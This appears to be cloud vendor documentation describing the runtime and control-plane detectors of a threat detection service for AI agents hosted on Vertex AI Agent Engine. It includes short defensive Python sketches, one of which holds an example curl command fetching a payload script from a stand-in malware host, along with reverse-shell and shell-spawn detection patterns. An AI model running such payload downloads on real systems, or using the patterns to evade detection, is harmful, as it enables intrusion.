Agent Engine Threat Detection overview

Premium and Enterprise service tiers

Preview

This feature is subject to the "Pre-GA Offerings Terms" in the General Service Terms section of the Service Specific Terms. Pre-GA features are available "as is" and might have limited support. For more information, see the launch stage descriptions.

This document describes Agent Engine Threat Detection and its detectors.

Agent Engine Threat Detection is a built-in service of Security Command Center that helps you detect and investigate potential attacks on AI agents that are deployed to Vertex AI Agent Engine Runtime. If the Agent Engine Threat Detection service detects a potential attack, the service generates a finding in Security Command Center in near-real time.

Agent Engine Threat Detection monitors the supported AI agents and detects the most common runtime threats. Runtime threats include the execution of malicious binaries or scripts, container escapes, reverse shells, and the use of attack tools within the agent's environment.

In addition, control-plane detectors from Event Threat Detection analyze various audit logs (including Identity and Access Management, BigQuery, and Cloud SQL logs) and Vertex AI Agent Engine logs (stdout and stderr) to detect suspicious activities. Control-plane threats include data exfiltration attempts, excessive permission denials, and suspicious token generation.

Benefits

Agent Engine Threat Detection offers the following benefits:

  • Proactively reduce risk for AI workloads. Agent Engine Threat Detection helps you detect and respond to threats early by monitoring the behavior and environment of your AI agents.
  • Manage AI security in a unified location. Agent Engine Threat Detection findings appear directly in Security Command Center. You have a central interface to view and manage threat findings alongside other cloud security risks.

How it works

Agent Engine Threat Detection collects telemetry from the hosted AI agents to analyze processes, scripts, and libraries that might indicate a runtime attack. When Agent Engine Threat Detection detects a potential threat, it does the following:

  1. Agent Engine Threat Detection uses a watcher process to collect event information while the agentic workload is running. The watcher process can take up to one minute to start and collect information.

  2. Agent Engine Threat Detection analyzes the collected event information to determine whether an event indicates an incident. Agent Engine Threat Detection uses natural language processing (NLP) to analyze Bash and Python scripts for malicious code.

    • If Agent Engine Threat Detection identifies an incident, it reports the incident as a finding in Security Command Center.

    • If Agent Engine Threat Detection doesn't identify an incident, it doesn't store any information.

    • All data collected is processed in memory and doesn't persist after analysis unless identified as an incident and reported as a finding.
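The steps above can be sketched as a simplified in-memory pipeline. This is illustrative only; the function names (`looks_malicious`, `process_events`) and the event shape are hypothetical stand-ins for the service's internal analysis, not an actual API:

```python
# Illustrative sketch of the detection flow described above: events collected
# by the watcher process are analyzed in memory, and only events identified
# as incidents persist as findings. All names here are hypothetical.

def looks_malicious(event: dict) -> bool:
    """Stand-in for the service's analysis (e.g. NLP over script content)."""
    return "reverse_shell" in event.get("indicators", [])

def process_events(events: list[dict]) -> list[dict]:
    findings = []
    for event in events:  # events gathered by the watcher process
        if looks_malicious(event):
            findings.append({"category": "AGENT_ENGINE_FINDING", "event": event})
        # otherwise the event is discarded; nothing is stored
    return findings

findings = process_events([
    {"indicators": ["reverse_shell"]},  # incident -> becomes a finding
    {"indicators": []},                 # benign -> discarded
])
```

The point of the sketch is the retention rule: a benign event leaves no trace after analysis, while an incident becomes a finding.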

For information about how to review Agent Engine Threat Detection findings in the Google Cloud console, see Review findings.

Detectors

This section lists the runtime and control-plane detectors that monitor AI agents that are deployed to Vertex AI Agent Engine Runtime.

Runtime detectors

Agent Engine Threat Detection includes the following runtime detectors:

Each entry shows the detector's display name, module name, and description.
Execution: Added Malicious Binary Executed (Preview)
Module name: AGENT_ENGINE_ADDED_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was not part of the original agentic workload.

This event strongly suggests that an attacker has control of the workload and is running malicious software.

Execution: Added Malicious Library Loaded (Preview)
Module name: AGENT_ENGINE_ADDED_MALICIOUS_LIBRARY_LOADED

A process loaded a library that threat intelligence identifies as malicious. This library was not part of the original agentic workload.

This event suggests that an attacker likely has control of the workload and is running malicious software.

Execution: Built in Malicious Binary Executed (Preview)
Module name: AGENT_ENGINE_BUILT_IN_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was part of the original agentic workload.

This event might suggest that an attacker is deploying a malicious workload. For example, the actor might have gained control of a legitimate build pipeline and injected the malicious binary into the agentic workload.

Execution: Container Escape (Preview)
Module name: AGENT_ENGINE_CONTAINER_ESCAPE

A process running inside the container attempted to bypass container isolation by using known exploit techniques or binaries, which threat intelligence identifies as potential threats. A successful escape can allow an attacker to access the host system and potentially compromise the entire environment.

This action suggests that an attacker is exploiting vulnerabilities to gain unauthorized access to the host system or broader infrastructure.

Execution: Kubernetes Attack Tool Execution (Preview)
Module name: AGENT_ENGINE_KUBERNETES_ATTACK_TOOL_EXECUTION

A process executed a Kubernetes-specific attack tool, which threat intelligence identifies as a potential threat.

This action suggests that an attacker has gained access to the cluster and is using the tool to exploit Kubernetes-specific vulnerabilities or configurations.

Execution: Local Reconnaissance Tool Execution (Preview)
Module name: AGENT_ENGINE_LOCAL_RECONNAISSANCE_TOOL_EXECUTION

A process executed a local reconnaissance tool that is not typically part of the agentic workload. Threat intelligence identifies these tools as potential threats.

This event suggests that an attacker is trying to gather internal system information, such as mapping the infrastructure, identifying vulnerabilities, or collecting data on system configurations.

Execution: Malicious Python Executed (Preview)
Module name: AGENT_ENGINE_MALICIOUS_PYTHON_EXECUTED

A machine learning model identified executed Python code as malicious. An attacker can use Python to download tools or files into a compromised environment and execute commands without using binaries.

The detector uses natural language processing (NLP) to analyze the Python code's content. Because this approach isn't based on signatures, detectors can identify known and novel malicious Python code.

Execution: Modified Malicious Binary Executed (Preview)
Module name: AGENT_ENGINE_MODIFIED_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was part of the original agentic workload but was modified at runtime.

This event suggests that an attacker might have control of the workload and is running malicious software.

Execution: Modified Malicious Library Loaded (Preview)
Module name: AGENT_ENGINE_MODIFIED_MALICIOUS_LIBRARY_LOADED

A process loaded a library that threat intelligence identifies as malicious. This library was part of the original agentic workload but was modified at runtime.

This event suggests that an attacker has control of the workload and is running malicious software.

Malicious Script Executed (Preview)
Module name: AGENT_ENGINE_MALICIOUS_SCRIPT_EXECUTED

A machine learning model identified executed Bash code as malicious. An attacker can use Bash to download tools or files into a compromised environment and execute commands without using binaries.

The detector uses NLP to analyze the Bash code's content. Because this approach is not based on signatures, detectors can identify known and novel malicious Bash code.

Malicious URL Observed (Preview)
Module name: AGENT_ENGINE_MALICIOUS_URL_OBSERVED

Agent Engine Threat Detection observed a malicious URL in the argument list of a running process.

The detector compares these URLs against the unsafe web resources lists maintained by the Google Safe Browsing service. If you believe that Google incorrectly classified a URL as a phishing site or malware, report the issue at Reporting Incorrect Data.
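The shape of this check can be sketched as follows. This is a deliberate simplification: the real detector consults the Google Safe Browsing service, whereas the `UNSAFE_URLS` set here is a hypothetical local stand-in for that lookup:

```python
import re

# Simplified illustration of the check described above: scan a process's
# argument list for URLs and compare them against an unsafe-URL list.
# UNSAFE_URLS is a hypothetical stand-in for the Safe Browsing lookup.
UNSAFE_URLS = {"http://malware.example.test/payload.sh"}

URL_RE = re.compile(r"https?://\S+")

def malicious_urls_in_argv(argv: list[str]) -> list[str]:
    """Return any URL in the argument list that appears on the unsafe list."""
    urls = [u for arg in argv for u in URL_RE.findall(arg)]
    return [u for u in urls if u in UNSAFE_URLS]

# A process fetching a known-bad URL would trigger a finding:
hits = malicious_urls_in_argv(
    ["curl", "-s", "http://malware.example.test/payload.sh"]
)
```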

Reverse Shell (Preview)
Module name: AGENT_ENGINE_REVERSE_SHELL

A process started with stream redirection to a remote connected socket. The detector looks for stdin bound to a remote socket.

A reverse shell allows an attacker to communicate from a compromised workload to an attacker-controlled machine. The attacker can then command and control the workload—for example, as part of a botnet.
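The "stdin bound to a socket" signal can be illustrated with how it surfaces on Linux: `/proc/<pid>/fd/0` is a symlink whose target reads `socket:[inode]` when fd 0 is a socket. The classifier below is a simplification of the detector, which additionally verifies that the socket's peer is remote:

```python
# Illustrative sketch of the reverse-shell signal described above: a shell is
# suspicious when its stdin (fd 0) resolves to a socket rather than a TTY or
# pipe. fd0_target is what os.readlink("/proc/<pid>/fd/0") would return.
# This is a simplified stand-in for the detector, not its actual logic.

def stdin_bound_to_socket(fd0_target: str) -> bool:
    """Classify a /proc/<pid>/fd/0 link target as socket-backed or not."""
    return fd0_target.startswith("socket:[")

# Typical link targets: a terminal, a pipe, and a connected socket.
assert not stdin_bound_to_socket("/dev/pts/0")    # interactive terminal
assert not stdin_bound_to_socket("pipe:[44231]")  # shell in a pipeline
assert stdin_bound_to_socket("socket:[98765]")    # reverse-shell pattern
```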

Unexpected Child Shell (Preview)
Module name: AGENT_ENGINE_UNEXPECTED_CHILD_SHELL

A process that does not normally invoke shells unexpectedly spawned a shell process.

The detector monitors process executions and generates a finding when a known parent process spawns a shell unexpectedly.
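A minimal sketch of this heuristic, assuming an allowlist-based baseline; the `EXPECTED_SHELL_PARENTS` set is hypothetical, since the detector's actual model of which parents legitimately spawn shells is not documented here:

```python
# Simplified sketch of the rule described above: flag a finding when a
# parent process that normally never spawns shells launches one.
# Both sets below are illustrative, not the detector's real baseline.
SHELLS = {"sh", "bash", "dash", "zsh"}
EXPECTED_SHELL_PARENTS = {"sshd", "login", "cron"}

def is_unexpected_child_shell(parent_comm: str, child_comm: str) -> bool:
    """True when a shell is spawned by a parent outside the baseline."""
    return child_comm in SHELLS and parent_comm not in EXPECTED_SHELL_PARENTS
```

Under these assumptions, a Python agent process spawning bash would be flagged, while sshd spawning bash would not.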

Control-plane detectors

This section describes the control-plane detectors from Event Threat Detection that are specifically designed for AI agents deployed to Vertex AI Agent Engine Runtime. Event Threat Detection also has detectors for general AI-related threats.

These control-plane detectors are enabled by default. You manage these detectors the same way you do other Event Threat Detection detectors. For more information, see Use Event Threat Detection.

Each entry shows the detector's display name, API name, log source types, and description.
Discovery: Agent Engine Service Account Self-Investigation (Preview)
API name: AGENT_ENGINE_IAM_ANOMALOUS_BEHAVIOR_SERVICE_ACCOUNT_GETS_OWN_IAM_POLICY
Log source types: Cloud Audit Logs: IAM Data Access audit logs (Permissions: DATA_READ)

An identity associated with an AI agent deployed to Vertex AI Agent Engine was used to investigate the roles and permissions associated with that same service account.

Sensitive roles

Findings are classified as High or Medium severity, depending on the sensitivity of the roles granted. For more information, see Sensitive IAM roles and permissions.

Exfiltration: Agent Engine initiated BigQuery Data Exfiltration (Preview)
API names: AGENT_ENGINE_BIG_QUERY_EXFIL_VPC_PERIMETER_VIOLATION, AGENT_ENGINE_BIG_QUERY_EXFIL_TO_EXTERNAL_TABLE
Log source types: Cloud Audit Logs: BigQueryAuditMetadata data access logs (Permissions: DATA_READ)

Detects the following scenarios of a BigQuery data exfiltration initiated by an agent deployed to Vertex AI Agent Engine:

  • Resources owned by the protected organization were saved outside of the organization, including copy or transfer operations.

    This scenario corresponds to the AGENT_ENGINE_BIG_QUERY_EXFIL_TO_EXTERNAL_TABLE finding type and has High severity.

  • Attempts were made to access BigQuery resources that are protected by VPC Service Controls.

    This scenario corresponds to the AGENT_ENGINE_BIG_QUERY_EXFIL_VPC_PERIMETER_VIOLATION finding type and has Low severity.

Exfiltration: Agent Engine initiated CloudSQL exfiltration (Preview)
API names: AGENT_ENGINE_CLOUDSQL_EXFIL_EXPORT_TO_PUBLIC_GCS, AGENT_ENGINE_CLOUDSQL_EXFIL_EXPORT_TO_EXTERNAL_GCS
Log source types: Cloud Audit Logs: MySQL data access logs, PostgreSQL data access logs, SQL Server data access logs

Detects the following scenarios of a Cloud SQL data exfiltration initiated by an agent deployed to Vertex AI Agent Engine:

  • Live instance data was exported to a Cloud Storage bucket outside of the organization.
  • Live instance data was exported to a Cloud Storage bucket that is owned by the organization and is publicly accessible.

For project-level activations of the Security Command Center Premium tier, this finding is available only if the Standard tier is enabled in the parent organization. Findings are classified as High severity by default.

Exfiltration: Agent Engine initiated BigQuery Data Extraction (Preview)
API name: AGENT_ENGINE_BIG_QUERY_EXFIL_TO_CLOUD_STORAGE
Log source types: Cloud Audit Logs: BigQueryAuditMetadata data access logs (Permissions: DATA_READ)

Detects the following scenarios of a BigQuery data extraction initiated by an agent deployed to Vertex AI Agent Engine:

  • A BigQuery resource owned by the protected organization was saved, through extraction operations, to a Cloud Storage bucket outside the organization.
  • A BigQuery resource owned by the protected organization was saved, through extraction operations, to a publicly accessible Cloud Storage bucket owned by that organization.

For project-level activations of the Security Command Center Premium tier, this finding is available only if the Standard tier is enabled in the parent organization. Findings are classified as Low severity by default.

Initial Access: Agent Engine Identity Excessive Permission Denied Actions (Preview)
API name: AGENT_ENGINE_EXCESSIVE_FAILED_ATTEMPT
Log source types: Cloud Audit Logs: Admin Activity logs

An identity associated with an AI agent deployed to Vertex AI Agent Engine repeatedly triggered permission denied errors by attempting changes across multiple methods and services. Findings are classified as Medium severity by default.
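The "repeated denials across multiple services" pattern can be sketched as a simple aggregation over audit-log entries. The entry shape and the threshold of three distinct services are illustrative assumptions, not the detector's actual log schema or tuning:

```python
# Illustrative sketch of the pattern described above: group PERMISSION_DENIED
# audit-log entries per identity and flag identities that fail across many
# distinct services. The log-entry fields and threshold are hypothetical.

def flag_excessive_denials(log_entries: list[dict], min_services: int = 3) -> set[str]:
    """Return principals denied across at least min_services distinct services."""
    denied_services: dict[str, set[str]] = {}
    for entry in log_entries:
        if entry.get("status") == "PERMISSION_DENIED":
            denied_services.setdefault(entry["principal"], set()).add(entry["service"])
    return {p for p, svcs in denied_services.items() if len(svcs) >= min_services}

# An agent identity probing IAM, BigQuery, and Cloud Storage and being denied
# each time fits the pattern; a single successful call does not.
entries = [
    {"principal": "agent-sa", "service": s, "status": "PERMISSION_DENIED"}
    for s in ("iam", "bigquery", "storage")
] + [{"principal": "user", "service": "iam", "status": "OK"}]
```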
Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)
API name: AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_IMPLICIT_DELEGATION
Log source types: Cloud Audit Logs: IAM Data Access audit logs

The iam.serviceAccounts.implicitDelegation permission was misused to generate access tokens from a more privileged service account through a Vertex AI Agent Engine. Findings are classified as Low severity by default.
Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)
API name: AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_CROSS_PROJECT_OPENID
Log source types: Cloud Audit Logs: IAM Data Access audit logs

The iam.serviceAccounts.getOpenIdToken IAM permission was used across projects through a Vertex AI Agent Engine.

This finding isn't available for project-level activations. Findings are classified as Low severity by default.

Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)
API name: AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_CROSS_PROJECT_ACCESS_TOKEN
Log source types: Cloud Audit Logs: IAM Data Access audit logs

The iam.serviceAccounts.getAccessToken IAM permission was used across projects through an AI agent deployed to Vertex AI Agent Engine.

This finding isn't available for project-level activations. Findings are classified as Low severity by default.

For deprecated and shut down rules, see Deprecations.


Last updated 2025-12-17 UTC.